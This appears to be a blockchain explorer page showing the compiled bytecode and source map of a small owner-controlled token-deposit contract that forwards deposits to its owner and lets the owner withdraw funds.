0405180910390fd5b6002600155610262336000546001600160a01b03166001600160a01b0385169190846104c2565b6001600160a01b0382166000908152600460209081526040808320338452909152902054610290908261051c565b6001600160a01b03831660008181526004602090815260408083203380855290835292819020948555426001909501859055805186815291820194909452919290917fd2d0080ed70ceb7ce39856d34a5727b439ec7c7919425087ed35ed6868791556910160405180910390a3505060018055565b6000546001600160a01b0316331461032f5760405162461bcd60e51b8152600401610232906108ec565b6103396000610582565b565b6000546001600160a01b031633146103655760405162461bcd60e51b8152600401610232906108ec565b6001600160a01b0383166103af576040516001600160a01b0383169082156108fc029083906000818181858888f193505050501580156103a9573d6000803e3d6000fd5b50505050565b60405163a9059cbb60e01b81526001600160a01b0383811660048301526024820183905284169063a9059cbb906044016020604051808303816000875af11580156103fe573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103a99190610921565b505050565b6000546001600160a01b031633146104515760405162461bcd60e51b8152600401610232906108ec565b6001600160a01b0381166104b65760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610232565b6104bf81610582565b50565b604080516001600160a01b0385811660248301528416604482015260648082018490528251808303909101815260849091019091526020810180516001600160e01b03166323b872dd60e01b1790526103a99085906105d2565b6000806105298385610943565b90508381101561057b5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610232565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610627826040518060400160405280602081526020017f5361666542455032303a206c6f772d6c6576656c2063616c6c206661696c6564815250856001600160a01b03166106a49092919063ffffffff16565b80519091501561042257808060200190518101906106459190610921565b6104225760405162461bcd60e51b815260206004820152602a60248201527f5361666542455032303a204245503230206f7065726174696f6e20646964206e6044820152691bdd081cdd58d8d9595960b21b6064820152608401610232565b60606106b384846000856106bb565b949350505050565b60608247101561071c5760405162461bcd60e51b815260206004820152602660248201527f416464726573733a20696e73756666696369656e742062616c616e636520666f6044820152651c8818d85b1b60d21b6064820152608401610232565b843b61076a5760405162461bcd60e51b815260206004820152601d60248201527f416464726573733a2063616c6c20746f206e6f6e2d636f6e74726163740000006044820152606401610232565b600080866001600160a01b031685876040516107869190610995565b60006040518083038185875af1925050503d80600081146107c3576040519150601f19603f3d011682016040523d82523d6000602084013e6107c8565b606091505b50915091506107d88282866107e3565b979650505050505050565b606083156107f257508161057b565b8251156108025782518084602001fd5b8160405162461bcd60e51b815260040161023291906109b1565b80356001600160a01b038116811461083357600080fd5b919050565b6000806040838503121561084b57600080fd5b6108548361081c565b946020939093013593505050565b60008060006060848603121561087757600080fd5b6108808461081c565b925061088e6020850161081c565b9150604084013590509250925092565b6000602082840312156108b057600080fd5b61057b8261081c565b600080604083850312156108cc57600080fd5b6108d58361081c565b91506108e36020840161081c565b90509250929050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60006020828403121561093357600080fd5b8151801515811461057b57600080fd5b6000821982111561096457634e487b7160e01b600052601160045260246000fd5b500190565b60005b8381101561098457818101518382015260200161096c565b838111156103a95750506000910152565b600082516109a7818460208701610969565b9190910192915050565b60208152600082518060208401526109d0816040850160208701610969565b601f01601f1916919091016040019291505056fea26469706673582212200bb665752994ae669cc6b658a1dc33a3f60ab510c7b45cc55670dd9b88e07b4a64736f6c634300080a0033

Deployed Bytecode

0x6080604052600436106100955760003560e01c8063bdbddb8411610059578063bdbddb841461014f578063c082867c146100a1578063f2fde38b1461016f578063f7c1e9651461018f578063fe45033c146100a157600080fd5b806359be348c146100a1578063715018a6146100c35780638da5cb5b146100d85780639a381cf01461010f578063ade0419b1461012f57600080fd5b3661009c57005b600080fd5b3480156100ad57600080fd5b506100c16100bc366004610838565b6101e3565b005b3480156100cf57600080fd5b506100c1610305565b3480156100e457600080fd5b506000546001600160a01b03165b6040516001600160a01b0390911681526020015b60405180910390f35b34801561011b57600080fd5b506002546100f2906001600160a01b031681565b34801561013b57600080fd5b506003546100f2906001600160a01b031681565b34801561015b57600080fd5b506100c161016a366004610862565b61033b565b34801561017b57600080fd5b506100c161018a36600461089e565b610427565b34801561019b57600080fd5b506101ce6101aa3660046108b9565b60046020908152600092835260408084209091529082529020805460019091015482565b60408051928352602083019190915201610106565b6002600154141561023b5760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c0060448201526064015b60405180910390fd5b6002600155610262336000546001600160a01b03166001600160a01b0385169190846104c2565b6001600160a01b0382166000908152600460209081526040808320338452909152902054610290908261051c565b6001600160a01b03831660008181526004602090815260408083203380855290835292819020948555426001909501859055805186815291820194909452919290917fd2d0080ed70ceb7ce39856d34a5727b439ec7c7919425087ed35ed6868791556910160405180910390a3505060018055565b6000546001600160a01b0316331461032f5760405162461bcd60e51b8152600401610232906108ec565b6103396000610582565b565b6000546001600160a01b031633146103655760405162461bcd60e51b8152600401610232906108ec565b6001600160a01b0383166103af576040516001600160a01b0383169082156108fc029083906000818181858888f193505050501580156103a9573d6000803e3d6000fd5b50505050565b60405163a9059cbb60e01b81526001600160a01b0383811660048301526024820183905284169063a9059cbb906044016020604051808303816000875af11580156103fe573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103a99190610921565b505050565b6000546001600160a01b031633146104515760405162461bcd60e51b8152600401610232906108ec565b6001600160a01b0381166104b65760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610232565b6104bf81610582565b50565b604080516001600160a01b0385811660248301528416604482015260648082018490528251808303909101815260849091019091526020810180516001600160e01b03166323b872dd60e01b1790526103a99085906105d2565b6000806105298385610943565b90508381101561057b5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610232565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610627826040518060400160405280602081526020017f5361666542455032303a206c6f772d6c6576656c2063616c6c206661696c6564815250856001600160a01b03166106a49092919063ffffffff16565b80519091501561042257808060200190518101906106459190610921565b6104225760405162461bcd60e51b815260206004820152602a60248201527f5361666542455032303a204245503230206f7065726174696f6e20646964206e6044820152691bdd081cdd58d8d9595960b21b6064820152608401610232565b60606106b384846000856106bb565b949350505050565b60608247101561071c5760405162461bcd60e51b815260206004820152602660248201527f416464726573733a20696e73756666696369656e742062616c616e636520666f6044820152651c8818d85b1b60d21b6064820152608401610232565b843b61076a5760405162461bcd60e51b815260206004820152601d60248201527f416464726573733a2063616c6c20746f206e6f6e2d636f6e74726163740000006044820152606401610232565b600080866001600160a01b031685876040516107869190610995565b60006040518083038185875af1925050503d80600081146107c3576040519150601f19603f3d011682016040523d82523d6000602084013e6107c8565b606091505b50915091506107d88282866107e3565b979650505050505050565b606083156107f257508161057b565b8251156108025782518084602001fd5b8160405162461bcd60e51b815260040161023291906109b1565b80356001600160a01b038116811461083357600080fd5b919050565b6000806040838503121561084b57600080fd5b6108548361081c565b946020939093013593505050565b60008060006060848603121561087757600080fd5b6108808461081c565b925061088e6020850161081c565b9150604084013590509250925092565b6000602082840312156108b057600080fd5b61057b8261081c565b600080604083850312156108cc57600080fd5b6108d58361081c565b91506108e36020840161081c565b90509250929050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60006020828403121561093357600080fd5b8151801515811461057b57600080fd5b6000821982111561096457634e487b7160e01b600052601160045260246000fd5b500190565b60005b8381101561098457818101518382015260200161096c565b838111156103a95750506000910152565b600082516109a7818460208701610969565b9190910192915050565b60208152600082518060208401526109d0816040850160208701610969565b601f01601f1916919091016040019291505056fea26469706673582212200bb665752994ae669cc6b658a1dc33a3f60ab510c7b45cc55670dd9b88e07b4a64736f6c634300080a0033

Deployed Bytecode Sourcemap

32766:2634:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34617:495;;;;;;;;;;-1:-1:-1;34617:495:0;;;;;:::i;:::-;;:::i;:::-;;22634:103;;;;;;;;;;;;;:::i;21983:87::-;;;;;;;;;;-1:-1:-1;22029:7:0;22056:6;-1:-1:-1;;;;;22056:6:0;21983:87;;;-1:-1:-1;;;;;615:32:1;;;597:51;;585:2;570:18;21983:87:0;;;;;;;;32914:39;;;;;;;;;;-1:-1:-1;32914:39:0;;;;-1:-1:-1;;;;;32914:39:0;;;32960;;;;;;;;;;-1:-1:-1;32960:39:0;;;;-1:-1:-1;;;;;32960:39:0;;;35124:273;;;;;;;;;;-1:-1:-1;35124:273:0;;;;;:::i;:::-;;:::i;22892:201::-;;;;;;;;;;-1:-1:-1;22892:201:0;;;;;:::i;:::-;;:::i;33100:67::-;;;;;;;;;;-1:-1:-1;33100:67:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1855:25:1;;;1911:2;1896:18;;1889:34;;;;1828:18;33100:67:0;1681:248:1;34617:495:0;31790:1;32388:7;;:19;;32380:63;;;;-1:-1:-1;;;32380:63:0;;2136:2:1;32380:63:0;;;2118:21:1;2175:2;2155:18;;;2148:30;2214:33;2194:18;;;2187:61;2265:18;;32380:63:0;;;;;;;;;31790:1;32521:7;:18;34721:59:::1;20848:10:::0;22029:7;22056:6;-1:-1:-1;;;;;22056:6:0;-1:-1:-1;;;;;34721:30:0;::::1;::::0;:59;34773:6;34721:30:::1;:59::i;:::-;-1:-1:-1::0;;;;;34840:16:0;::::1;;::::0;;;:9:::1;:16;::::0;;;;;;;20848:10;34840:30;;;;;;;:44;:56:::1;::::0;34889:6;34840:48:::1;:56::i;:::-;-1:-1:-1::0;;;;;34793:16:0;::::1;;::::0;;;:9:::1;:16;::::0;;;;;;;20848:10;34793:30;;;;;;;;;;:103;;;34950:15:::1;34907:40;::::0;;::::1;:58:::0;;;34983:121;;1855:25:1;;;1896:18;;;1889:34;;;;34793:16:0;;20848:10;;34983:121:::1;::::0;1828:18:1;34983:121:0::1;;;;;;;-1:-1:-1::0;;31746:1:0;32700:22;;34617:495::o;22634:103::-;22029:7;22056:6;-1:-1:-1;;;;;22056:6:0;20848:10;22203:23;22195:68;;;;-1:-1:-1;;;22195:68:0;;;;;;;:::i;:::-;22699:30:::1;22726:1;22699:18;:30::i;:::-;22634:103::o:0;35124:273::-;22029:7;22056:6;-1:-1:-1;;;;;22056:6:0;20848:10;22203:23;22195:68;;;;-1:-1:-1;;;22195:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;35240:19:0;::::1;35237:153;;35275:33;::::0;-1:-1:-1;;;;;35275:25:0;::::1;::::0;:33;::::1;;;::::0;35301:6;;35275:33:::1;::::0;;;35301:6;35275:25;:33;::::1;;;;;;;;;;;;;::::0;::::1;;;;;;35124:273:::0;;;:::o;35237:153::-:1;35340:38;::::0;-1:-1:-1;;;35340:38:0;;-1:-1:-1;;;;;2847:32:1;;;35340:38:0::1;::::0;::::1;2829:51:1::0;2896:18;;;2889:34;;;35340:22:0;::::1;::::0;::::1;::::0;2802:18:1;;35340:38:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;35237:153::-;35124:273:::0;;;:::o;22892:201::-;22029:7;22056:6;-1:-1:-1;;;;;22056:6:0;20848:10;22203:23;22195:68;;;;-1:-1:-1;;;22195:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;22981:22:0;::::1;22973:73;;;::::0;-1:-1:-1;;;22973:73:0;;3418:2:1;22973:73:0::1;::::0;::::1;3400:21:1::0;3457:2;3437:18;;;3430:30;3496:34;3476:18;;;3469:62;-1:-1:-1;;;3547:18:1;;;3540:36;3593:19;;22973:73:0::1;3216:402:1::0;22973:73:0::1;23057:28;23076:8;23057:18;:28::i;:::-;22892:201:::0;:::o;17124:248::-;17295:68;;;-1:-1:-1;;;;;3881:15:1;;;17295:68:0;;;3863:34:1;3933:15;;3913:18;;;3906:43;3965:18;;;;3958:34;;;17295:68:0;;;;;;;;;;3798:18:1;;;;17295:68:0;;;;;;;;-1:-1:-1;;;;;17295:68:0;-1:-1:-1;;;17295:68:0;;;17268:96;;17288:5;;17268:19;:96::i;3799:181::-;3857:7;;3889:5;3893:1;3889;:5;:::i;:::-;3877:17;;3918:1;3913;:6;;3905:46;;;;-1:-1:-1;;;3905:46:0;;4435:2:1;3905:46:0;;;4417:21:1;4474:2;4454:18;;;4447:30;4513:29;4493:18;;;4486:57;4560:18;;3905:46:0;4233:351:1;3905:46:0;3971:1;3799:181;-1:-1:-1;;;3799:181:0:o;23253:191::-;23327:16;23346:6;;-1:-1:-1;;;;;23363:17:0;;;-1:-1:-1;;;;;;23363:17:0;;;;;;23396:40;;23346:6;;;;;;;23396:40;;23327:16;23396:40;23316:128;23253:191;:::o;19478:716::-;19902:23;19928:69;19956:4;19928:69;;;;;;;;;;;;;;;;;19936:5;-1:-1:-1;;;;;19928:27:0;;;:69;;;;;:::i;:::-;20012:17;;19902:95;;-1:-1:-1;20012:21:0;20008:179;;20109:10;20098:30;;;;;;;;;;;;:::i;:::-;20090:85;;;;-1:-1:-1;;;20090:85:0;;4791:2:1;20090:85:0;;;4773:21:1;4830:2;4810:18;;;4803:30;4869:34;4849:18;;;4842:62;-1:-1:-1;;;4920:18:1;;;4913:40;4970:19;;20090:85:0;4589:406:1;11827:229:0;11964:12;11996:52;12018:6;12026:4;12032:1;12035:12;11996:21;:52::i;:::-;11989:59;11827:229;-1:-1:-1;;;;11827:229:0:o;12947:510::-;13117:12;13175:5;13150:21;:30;;13142:81;;;;-1:-1:-1;;;13142:81:0;;5202:2:1;13142:81:0;;;5184:21:1;5241:2;5221:18;;;5214:30;5280:34;5260:18;;;5253:62;-1:-1:-1;;;5331:18:1;;;5324:36;5377:19;;13142:81:0;5000:402:1;13142:81:0;9344:20;;13234:60;;;;-1:-1:-1;;;13234:60:0;;5609:2:1;13234:60:0;;;5591:21:1;5648:2;5628:18;;;5621:30;5687:31;5667:18;;;5660:59;5736:18;;13234:60:0;5407:353:1;13234:60:0;13308:12;13322:23;13349:6;-1:-1:-1;;;;;13349:11:0;13368:5;13375:4;13349:31;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13307:73;;;;13398:51;13415:7;13424:10;13436:12;13398:16;:51::i;:::-;13391:58;12947:510;-1:-1:-1;;;;;;;12947:510:0:o;15633:712::-;15783:12;15812:7;15808:530;;;-1:-1:-1;15843:10:0;15836:17;;15808:530;15957:17;;:21;15953:374;;16155:10;16149:17;16216:15;16203:10;16199:2;16195:19;16188:44;15953:374;16298:12;16291:20;;-1:-1:-1;;;16291:20:0;;;;;;;;:::i;14:173:1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:70;;177:1;174;167:12;111:70;14:173;;;:::o;192:254::-;260:6;268;321:2;309:9;300:7;296:23;292:32;289:52;;;337:1;334;327:12;289:52;360:29;379:9;360:29;:::i;:::-;350:39;436:2;421:18;;;;408:32;;-1:-1:-1;;;192:254:1:o;892:328::-;969:6;977;985;1038:2;1026:9;1017:7;1013:23;1009:32;1006:52;;;1054:1;1051;1044:12;1006:52;1077:29;1096:9;1077:29;:::i;:::-;1067:39;;1125:38;1159:2;1148:9;1144:18;1125:38;:::i;:::-;1115:48;;1210:2;1199:9;1195:18;1182:32;1172:42;;892:328;;;;;:::o;1225:186::-;1284:6;1337:2;1325:9;1316:7;1312:23;1308:32;1305:52;;;1353:1;1350;1343:12;1305:52;1376:29;1395:9;1376:29;:::i;1416:260::-;1484:6;1492;1545:2;1533:9;1524:7;1520:23;1516:32;1513:52;;;1561:1;1558;1551:12;1513:52;1584:29;1603:9;1584:29;:::i;:::-;1574:39;;1632:38;1666:2;1655:9;1651:18;1632:38;:::i;:::-;1622:48;;1416:260;;;;;:::o;2294:356::-;2496:2;2478:21;;;2515:18;;;2508:30;2574:34;2569:2;2554:18;;2547:62;2641:2;2626:18;;2294:356::o;2934:277::-;3001:6;3054:2;3042:9;3033:7;3029:23;3025:32;3022:52;;;3070:1;3067;3060:12;3022:52;3102:9;3096:16;3155:5;3148:13;3141:21;3134:5;3131:32;3121:60;;3177:1;3174;3167:12;4003:225;4043:3;4074:1;4070:6;4067:1;4064:13;4061:136;;;4119:10;4114:3;4110:20;4107:1;4100:31;4154:4;4151:1;4144:15;4182:4;4179:1;4172:15;4061:136;-1:-1:-1;4213:9:1;;4003:225::o;5765:258::-;5837:1;5847:113;5861:6;5858:1;5855:13;5847:113;;;5937:11;;;5931:18;5918:11;;;5911:39;5883:2;5876:10;5847:113;;;5978:6;5975:1;5972:13;5969:48;;;-1:-1:-1;;6013:1:1;5995:16;;5988:27;5765:258::o;6028:274::-;6157:3;6195:6;6189:13;6211:53;6257:6;6252:3;6245:4;6237:6;6233:17;6211:53;:::i;:::-;6280:16;;;;;6028:274;-1:-1:-1;;6028:274:1:o;6307:383::-;6456:2;6445:9;6438:21;6419:4;6488:6;6482:13;6531:6;6526:2;6515:9;6511:18;6504:34;6547:66;6606:6;6601:2;6590:9;6586:18;6581:2;6573:6;6569:15;6547:66;:::i;:::-;6674:2;6653:15;-1:-1:-1;;6649:29:1;6634:45;;;;6681:2;6630:54;;6307:383;-1:-1:-1;;6307:383:1:o

Swarm Source

ipfs://0bb665752994ae669cc6b658a1dc33a3f60ab510c7b45cc55670dd9b88e07b4a

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.